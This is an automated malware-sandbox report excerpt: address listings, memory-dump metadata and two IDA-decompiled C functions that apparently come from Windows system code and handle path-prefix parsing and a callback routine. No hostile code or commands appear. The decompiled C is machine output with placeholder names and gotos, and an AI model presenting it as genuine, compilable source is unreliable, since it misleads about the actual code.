              0x04c9625c
              0x04c9625e
              0x04c96260
              0x04c96260
              0x04c96260
              0x04c96260
              0x04c9625e
              0x04c96264
              0x04c96267
              0x04c96269
              0x04c96315
              0x04c96315
              0x04c9631b
              0x04c9631e
              0x04c96324
              0x04c96327
              0x04c9632f
              0x04c96330
              0x04c96333
              0x04c9633a
              0x04c9633c
              0x04c96335
              0x04c96335
              0x04c96335
              0x04c9633f
              0x04c96342
              0x04c9634c
              0x04c96352
              0x04c96355
              0x04c96355
              0x04c96359
              0x00000000
              0x04c9626f
              0x04c96275
              0x04c96275
              0x04c96278
              0x04c9627e
              0x04c9627e
              0x04c96281
              0x04c96287
              0x04c9628d
              0x04c96298
              0x04c9629c
              0x04c962a2
              0x04c9629e
              0x04c9629e
              0x04c9629e
              0x04c962a7
              0x04c962a7
              0x04c962aa
              0x04c962b0
              0x04c962f0
              0x04c962f0
              0x04c962f2
              0x04c962f8
              0x04c962fd
              0x04c962b2
              0x04c962b2
              0x04c962b2
              0x04c962b5
              0x04c962dd
              0x04c962e2
              0x04c962e5
              0x04c962b7
              0x04c962b8
              0x04c962bb
              0x04c962bd
              0x04c962c0
              0x04c962c4
              0x04c962cd
              0x04c962cd
              0x04c962c0
              0x04c962bb
              0x04c962b5
              0x04c96302
              0x04c96303
              0x04c96305
              0x04c96305
              0x04c96305
              0x04c9630c
              0x04c9630c
              0x00000000
              0x04c9627e
              0x04c96269
              0x04c95eac
              0x04c95ebb
              0x04c95ebe
              0x04c95ecb
              0x04c95ecb
              0x04c95ece
              0x04c95ece
              0x04c95ed4
              0x04c95ed7
              0x04c95ed9
              0x04c95edb
              0x04c95edb
              0x04c95ee1
              0x04c95ee1
              0x04c95ee3
              0x04c95f20
              0x04c95f20
              0x04c95ee5
              0x04c95ee5
              0x04c95ee5
              0x04c95ee8
              0x04c95f11
              0x04c95f18
              0x04c95eea
              0x04c95eea
              0x04c95eed
              0x04c95ef2
              0x04c95ef8
              0x04c95efb
              0x04c95f0a
              0x04c95f0a
              0x04c95eed
              0x04c95ee8
              0x04c95f22
              0x04c95f28
              0x00000000
              0x00000000
              0x04c95f30
              0x04c95f31
              0x04c95f37
              0x04c95f3a
              0x04c95f3d
              0x04c95f44
              0x00000000
              0x00000000
              0x00000000
              0x04c95f46
              0x04c95f48
              0x04c95f4d
              0x00000000
              0x04c95f4d
              0x04c95dda
              0x04c95ddf
              0x00000000
              0x04c95ddf
              0x04c95dd8
              0x04c95da7
              0x04c95da9
              0x04c95dac
              0x04c95dae
              0x00000000
              0x04c95db4
              0x04c95db4
              0x00000000
              0x04c95db4
              0x04c95dae
              0x04c95d88
              0x04c95d8d
              0x04c96363
              0x04c96369
              0x04c9636a
              0x04c96370
              0x04c96372
              0x04c9637a
              0x04c9637b
              0x04c9637d
              0x00000000
              0x00000000
              0x04c9637f
              0x04c96385
              0x00000000
              0x04c96385
              0x04c95d38
              0x04c95d3b
              0x00000000
              0x00000000
              0x00000000
              0x04c95d3b
              0x04c95d27
              0x04c95d29
              0x00000000
              0x00000000
              0x00000000
              0x04c96360
              0x00000000
              0x04c96360
              0x04c95c10
              0x04c95c10
              0x04c963da
              0x04c963e5
              0x04c963e5

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7669b3f87ada70df4569d81fc5229d5e1ae931e4d2e0f250602b0f08cc6c44ea
              • Instruction ID: f58ed6abbd73d422c18eecca42f620e16f1bad23384015d0b2277f5c569b5755
              • Opcode Fuzzy Hash: 7669b3f87ada70df4569d81fc5229d5e1ae931e4d2e0f250602b0f08cc6c44ea
              • Instruction Fuzzy Hash: 68424D75A00219EFDB24CF68C884BA9B7F2FF45314F1481AAD94DAB281D774AE85CF50
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BE4120 Relevance: .4, Instructions: 444COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 92%
              			E04BE4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x4cbd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E04BFF232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04BE6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04BE4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04BE6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M04BE45F8))) {
												case 0:
													_v568 = 0x4ba1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x4ba11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04BE4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E04C0F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E04C0F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E04BC52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E04BDEB70(1, 0x4cb79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E04BDAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E04C095D0();
																			L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E04C0B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04C03D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E04C0B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}















































































              0x04be4128
              0x04be4135
              0x04be413c
              0x04be4141
              0x04be4145
              0x04be4147
              0x04be414e
              0x04be4151
              0x04be4159
              0x04be415c
              0x04be4160
              0x04be4164
              0x04be4168
              0x04be416c
              0x04be417f
              0x04be4181
              0x04be446a
              0x04be446a
              0x04be418c
              0x04be4195
              0x04be4199
              0x04be4432
              0x04be4439
              0x04be443d
              0x04be4442
              0x04be4447
              0x00000000
              0x04be419f
              0x04be41a3
              0x04be41b1
              0x04be41b9
              0x04be41bd
              0x04be45db
              0x04be45db
              0x00000000
              0x04be41c3
              0x04be41c3
              0x04be41ce
              0x04be41d4
              0x04c2e138
              0x04c2e13e
              0x04c2e169
              0x04c2e16d
              0x04c2e19e
              0x04c2e16f
              0x04c2e16f
              0x04c2e175
              0x04c2e179
              0x04c2e18f
              0x04c2e193
              0x00000000
              0x04c2e199
              0x00000000
              0x04c2e199
              0x04c2e193
              0x00000000
              0x00000000
              0x00000000
              0x04be41da
              0x04be41da
              0x04be41df
              0x04be41e4
              0x04be41ec
              0x04be4203
              0x04be4207
              0x04c2e1fd
              0x04be4222
              0x04be4226
              0x04c2e1f3
              0x04c2e1f3
              0x04be422c
              0x04be422c
              0x04be4233
              0x04c2e1ed
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be4239
              0x04be4239
              0x04be4239
              0x04be4239
              0x04be4233
              0x04be4226
              0x04be41ee
              0x04be41ee
              0x04be41f4
              0x04be4575
              0x04c2e1b1
              0x04c2e1b1
              0x00000000
              0x04be457b
              0x04be457b
              0x04be4582
              0x04c2e1ab
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be4588
              0x04be4588
              0x04be458c
              0x04c2e1c4
              0x04c2e1c4
              0x00000000
              0x04be4592
              0x04be4592
              0x04be4599
              0x04c2e1be
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be459f
              0x04be459f
              0x04be45a3
              0x04c2e1d7
              0x04c2e1e4
              0x00000000
              0x04be45a9
              0x04be45a9
              0x04be45b0
              0x04c2e1d1
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be45b6
              0x04be45b6
              0x04be45b6
              0x00000000
              0x04be45b6
              0x04be45b0
              0x04be45a3
              0x04be4599
              0x04be458c
              0x04be4582
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be41f4
              0x04be423e
              0x04be4241
              0x04be45c0
              0x04be45c4
              0x00000000
              0x04be45ca
              0x04be45ca
              0x00000000
              0x04c2e207
              0x04c2e20f
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x04be45d1
              0x00000000
              0x00000000
              0x04be45ca
              0x00000000
              0x04be4247
              0x04be4247
              0x04be4247
              0x04be4249
              0x04be4249
              0x04be4249
              0x04be4251
              0x04be4251
              0x04be4257
              0x04be425f
              0x04be426e
              0x04be4270
              0x04be427a
              0x04c2e219
              0x04c2e219
              0x04be4280
              0x04be4282
              0x04be4456
              0x04be45ea
              0x00000000
              0x04be45f0
              0x04c2e223
              0x00000000
              0x04c2e223
              0x04be445c
              0x04be445c
              0x00000000
              0x04be445c
              0x00000000
              0x04be4288
              0x04be428c
              0x04c2e298
              0x04be4292
              0x04be4292
              0x04be429e
              0x04be42a3
              0x04be42a7
              0x04be42ac
              0x04c2e22d
              0x04be42b2
              0x04be42b2
              0x04be42b9
              0x04be42bc
              0x04be42c2
              0x04be42ca
              0x04be42cd
              0x04be42cd
              0x04be42d4
              0x04be433f
              0x04be433f
              0x04be42d6
              0x04be42d6
              0x04be42d9
              0x04be42dd
              0x04be42eb
              0x04c2e23a
              0x04be42f1
              0x04be4305
              0x04be430d
              0x04be4315
              0x04be4318
              0x04be431f
              0x04be4322
              0x04be432e
              0x04be433b
              0x04be433b
              0x00000000
              0x04be432e
              0x04be42eb
              0x04be434c
              0x04be434e
              0x04be4352
              0x04be4359
              0x04be435e
              0x04be4361
              0x04be436e
              0x04be438a
              0x04be438e
              0x04be4396
              0x04be439e
              0x04be43a1
              0x04be43ad
              0x04be43bb
              0x04be43bb
              0x04be43ad
              0x04be436e
              0x04be43bf
              0x04be43c5
              0x04be4463
              0x04be4463
              0x04be43ce
              0x04be43d5
              0x04be43d9
              0x04be43df
              0x04be4475
              0x04be4479
              0x04be4491
              0x04be4491
              0x04be4479
              0x04be43e5
              0x04be43eb
              0x04be43f4
              0x04be43f6
              0x04be43f9
              0x04be43fc
              0x04be43ff
              0x04be44e8
              0x04be44ed
              0x04be44f3
              0x04c2e247
              0x00000000
              0x04be44f9
              0x04be4504
              0x04be4508
              0x04be450f
              0x04c2e269
              0x00000000
              0x04be4515
              0x04be4519
              0x04be4531
              0x04be4534
              0x04be4537
              0x04be453e
              0x04be4541
              0x04be454a
              0x04c2e255
              0x04c2e255
              0x04c2e25b
              0x04c2e25e
              0x04c2e261
              0x04c2e261
              0x04be4555
              0x04be4559
              0x04be455d
              0x04c2e26d
              0x04c2e270
              0x04c2e274
              0x04c2e27a
              0x04c2e27d
              0x04c2e28e
              0x04c2e28e
              0x04be4563
              0x04be4563
              0x04be4569
              0x04be4569
              0x00000000
              0x04be455d
              0x04be450f
              0x00000000
              0x04be44f3
              0x04be43ff
              0x04be4405
              0x04be4405
              0x04be4405
              0x04be42ac
              0x04be428c
              0x04be4282
              0x04be4407
              0x04be440d
              0x04c2e2af
              0x04c2e2af
              0x04be4413
              0x04be4413
              0x00000000
              0x04be41d4
              0x00000000
              0x04be41c3
              0x04be41bd
              0x04be4415
              0x04be4415
              0x04be4416
              0x04be4417
              0x04be4429
              0x04be416e
              0x04be416e
              0x04be4175
              0x04be4498
              0x04be449f
              0x04c2e12d
              0x00000000
              0x04c2e133
              0x00000000
              0x04c2e133
              0x04be44a5
              0x04be44a5
              0x04be44aa
              0x00000000
              0x04be44bb
              0x04be44ca
              0x04be44d6
              0x04be44d7
              0x04be44d8
              0x04be44e3
              0x04be44e3
              0x04be44aa
              0x04be417b
              0x04be417b
              0x04be417b
              0x00000000
              0x04be417b
              0x04be4175
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 62c1bccd81afbd535bdd55023dca1711f2bcd4940eae13d673537c0fc1465ef5
              • Instruction ID: 245d05ac57588d5078053bab60d2bd10a9d78a9dafc0d7e377991d67505c839c
              • Opcode Fuzzy Hash: 62c1bccd81afbd535bdd55023dca1711f2bcd4940eae13d673537c0fc1465ef5
              • Instruction Fuzzy Hash: 49F16E746083118BC724CF1AC580A3AB7F2EFC8718F1549AEF486DB291E774E991DB52
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF513A Relevance: .3, Instructions: 258COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E04BF513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x4cbd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E04C0D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04BE2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04BE4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E04C0F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04BDFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x4cbb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E04C0B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































              0x04bf5142
              0x04bf514c
              0x04bf5150
              0x04bf5157
              0x04bf5159
              0x04bf515e
              0x04bf5165
              0x04bf5169
